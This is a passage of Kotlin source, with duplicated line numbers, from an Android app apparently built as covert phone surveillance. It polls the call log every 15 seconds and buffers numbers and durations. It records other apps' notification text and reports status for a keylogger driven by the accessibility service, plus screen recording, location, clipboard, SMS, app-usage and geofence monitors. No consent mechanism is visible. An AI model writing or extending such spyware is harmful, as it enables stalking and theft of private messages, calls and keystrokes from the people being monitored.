   806→   806→        }
   807→   807→        
   808→   808→        return "SMS monitoring started"
   809→   809→    }
   810→   810→
   811→   811→    fun smsMonitorStop(): String {
   812→   812→        smsMonitorActive = false
   813→   813→        smsMonitorJob?.cancel()
   814→   814→        smsMonitorJob = null
   815→   815→        return "SMS monitoring stopped"
   816→   816→    }
   817→   817→
   818→   818→    fun isSmsMonitorActive(): Boolean = smsMonitorActive
   819→   819→
   820→   820→    // ===== CALL MONITOR =====
   821→   821→    fun callMonitorStart(context: Context): String {
   822→   822→        if (callMonitorActive) {
   823→   823→            return "Call monitoring already active"
   824→   824→        }
   825→   825→        
   826→   826→        callMonitorActive = true
   827→   827→        
   828→   828→        callMonitorJob = CoroutineScope(Dispatchers.IO).launch {
   829→   829→            var lastCallId = 0L
   830→   830→            
   831→   831→            while (isActive && callMonitorActive) {
   832→   832→                try {
   833→   833→                    if (ActivityCompat.checkSelfPermission(context, Manifest.permission.READ_CALL_LOG) 
   834→   834→                        == PackageManager.PERMISSION_GRANTED) {
   835→   835→                        
   836→   836→                        val projection = arrayOf(
   837→   837→                            CallLog.Calls._ID,
   838→   838→                            CallLog.Calls.NUMBER,
   839→   839→                            CallLog.Calls.DATE,
   840→   840→                            CallLog.Calls.DURATION,
   841→   841→                            CallLog.Calls.TYPE
   842→   842→                        )
   843→   843→                        
   844→   844→                        context.contentResolver.query(
   845→   845→                            CallLog.Calls.CONTENT_URI,
   846→   846→                            projection, null, null, "${CallLog.Calls._ID} DESC LIMIT 1"
   847→   847→                        )?.use { cursor ->
   848→   848→                            if (cursor.moveToFirst()) {
   849→   849→                                val id = cursor.getLong(0)
   850→   850→                                
   851→   851→                                if (id > lastCallId) {
   852→   852→                                    lastCallId = id
   853→   853→                                    
   854→   854→                                    val number = cursor.getString(1)
   855→   855→                                    val date = cursor.getLong(2)
   856→   856→                                    val duration = cursor.getLong(3)
   857→   857→                                    val type = when (cursor.getInt(4)) {
   858→   858→                                        CallLog.Calls.INCOMING_TYPE -> "incoming"
   859→   859→                                        CallLog.Calls.OUTGOING_TYPE -> "outgoing"
   860→   860→                                        CallLog.Calls.MISSED_TYPE -> "missed"
   861→   861→                                        else -> "unknown"
   862→   862→                                    }
   863→   863→                                    
   864→   864→                                    // Buffer event locally
   865→   865→                                    com.abuzahra.manager.EventBuffer.addEvent(
   866→   866→                                        "call_log_change",
   867→   867→                                        mapOf(
   868→   868→                                            "number" to number,
   869→   869→                                            "type" to type,
   870→   870→                                            "duration" to duration
   871→   871→                                        )
   872→   872→                                    )
   873→   873→                                }
   874→   874→                            }
   875→   875→                        }
   876→   876→                    }
   877→   877→                    
   878→   878→                    delay(15000) // Check every 15 seconds
   879→   879→                } catch (e: Exception) {
   880→   880→                    Log.e(TAG, "Call monitor error", e)
   881→   881→                    delay(30000)
   882→   882→                }
   883→   883→            }
   884→   884→        }
   885→   885→        
   886→   886→        return "Call monitoring started"
   887→   887→    }
   888→   888→
   889→   889→    fun callMonitorStop(): String {
   890→   890→        callMonitorActive = false
   891→   891→        callMonitorJob?.cancel()
   892→   892→        callMonitorJob = null
   893→   893→        return "Call monitoring stopped"
   894→   894→    }
   895→   895→
   896→   896→    fun isCallMonitorActive(): Boolean = callMonitorActive
   897→   897→
   898→   898→    // ===== NOTIFICATION MONITOR =====
   899→   899→    fun notificationMonitorStart(): Map<String, Any> {
   900→   900→        notificationMonitorActive = true
   901→   901→        val listenerService = com.abuzahra.manager.service.MyNotificationListenerService.getInstance()
   902→   902→        val isConnected = listenerService != null
   903→   903→        val status = if (isConnected) {
   904→   904→            "Notification monitoring started - NotificationListenerService is connected"
   905→   905→        } else {
   906→   906→            "Notification monitoring started - NotificationListenerService NOT connected. Ensure it is enabled in Settings > Notification Access."
   907→   907→        }
   908→   908→        return mapOf(
   909→   909→            "active" to true,
   910→   910→            "service_connected" to isConnected,
   911→   911→            "history_count" to notificationHistory.size,
   912→   912→            "message" to status
   913→   913→        )
   914→   914→    }
   915→   915→
   916→   916→    fun notificationMonitorStop(): Map<String, Any> {
   917→   917→        notificationMonitorActive = false
   918→   918→        return mapOf(
   919→   919→            "active" to false,
   920→   920→            "history_count" to notificationHistory.size,
   921→   921→            "message" to "Notification monitoring stopped. ${notificationHistory.size} notifications captured during session."
   922→   922→        )
   923→   923→    }
   924→   924→    
   925→   925→    fun addNotification(packageName: String, title: String?, text: String?, category: String?) {
   926→   926→        if (notificationMonitorActive) {
   927→   927→            val entry = NotificationEntry(
   928→   928→                timestamp = System.currentTimeMillis(),
   929→   929→                packageName = packageName,
   930→   930→                title = title,
   931→   931→                text = text,
   932→   932→                category = category
   933→   933→            )
   934→   934→            notificationHistory.add(entry)
   935→   935→            
   936→   936→            while (notificationHistory.size > MAX_NOTIFICATION_HISTORY) {
   937→   937→                notificationHistory.poll()
   938→   938→            }
   939→   939→        }
   940→   940→    }
   941→   941→    
   942→   942→    fun getNotificationHistory(): List<Map<String, Any>> {
   943→   943→        return notificationHistory.toList().map { entry ->
   944→   944→            mapOf(
   945→   945→                "timestamp" to entry.timestamp,
   946→   946→                "datetime" to formatTimestamp(entry.timestamp),
   947→   947→                "package" to entry.packageName,
   948→   948→                "title" to (entry.title ?: ""),
   949→   949→                "text" to (entry.text ?: ""),
   950→   950→                "category" to (entry.category ?: "")
   951→   951→            )
   952→   952→        }
   953→   953→    }
   954→   954→
   955→   955→    // ===== GET ALL MONITOR STATUS =====
   956→   956→    fun getAllStatus(): Map<String, Any> {
   957→   957→        return mapOf(
   958→   958→            "keylogger" to mapOf(
   959→   959→                "active" to keyloggerActive,
   960→   960→                "entries" to keylogBuffer.size,
   961→   961→                "accessibility_connected" to (MyAccessibilityService.getInstance() != null)
   962→   962→            ),
   963→   963→            "screen_recording" to screenRecordingActive,
   964→   964→            "location_tracking" to mapOf(
   965→   965→                "active" to locationTrackingActive,
   966→   966→                "history_count" to locationHistory.size
   967→   967→            ),
   968→   968→            "clipboard_monitor" to mapOf(
   969→   969→                "active" to clipboardMonitorActive,
   970→   970→                "history_count" to clipboardHistory.size
   971→   971→            ),
   972→   972→            "wifi_monitor" to wifiMonitorActive,
   973→   973→            "app_monitor" to mapOf(
   974→   974→                "active" to appMonitorActive,
   975→   975→                "log_count" to appUsageLog.size
   976→   976→            ),
   977→   977→            "sms_monitor" to smsMonitorActive,
   978→   978→            "call_monitor" to callMonitorActive,
   979→   979→            "notification_monitor" to mapOf(
   980→   980→                "active" to notificationMonitorActive,
   981→   981→                "history_count" to notificationHistory.size
   982→   982→            ),
   983→   983→            "geofences" to geoFences.size
   984→   984→        )
   985→   985→    }
   986→   986→    
   987→   987→    // ===== LIFECYCLE =====
   988→   988→    fun initialize() {
   989→   989→        loadGeofences()
   990→   990→    }
   991→   991→    
   992→   992→    fun cleanup() {
   993→   993→        keyloggerActive = false
   994→   994→        screenRecordingActive = false
   995→   995→        locationTrackingActive = false
   996→   996→        clipboardMonitorActive = false
   997→   997→        wifiMonitorActive = false
   998→   998→        appMonitorActive = false
   999→   999→        smsMonitorActive = false
  1000→  1000→        callMonitorActive = false
  1001→  1001→        notificationMonitorActive = false
  1002→  1002→        
  1003→  1003→        locationJob?.cancel()
  1004→  1004→        clipboardJob?.cancel()
  1005→  1005→        wifiJob?.cancel()
  1006→  1006→        appMonitorJob?.cancel()
  1007→  1007→        smsMonitorJob?.cancel()
  1008→  1008→        callMonitorJob?.cancel()
  1009→  1009→        
  1010→  1010→        locationListener = null
  1011→  1011→    }
  1012→  1012→    
  1013→  1013→    // ===== HELPERS =====
  1014→  1014→    private fun formatTimestamp(timestamp: Long): String {
  1015→  1015→        val sdf = SimpleDateFormat("yyyy-MM-dd HH:mm:ss", Locale.getDefault())
  1016→  1016→        return sdf.format(Date(timestamp))
  1017→  1017→    }
  1018→  1018→    
  1019→  1019→    private fun getDateString(): String {
  1020→  1020→        val sdf = SimpleDateFormat("yyyy-MM-dd", Locale.getDefault())
  1021→  1021→        return sdf.format(Date())
  1022→  1022→    }
  1023→  1023→}
  1024→  1024→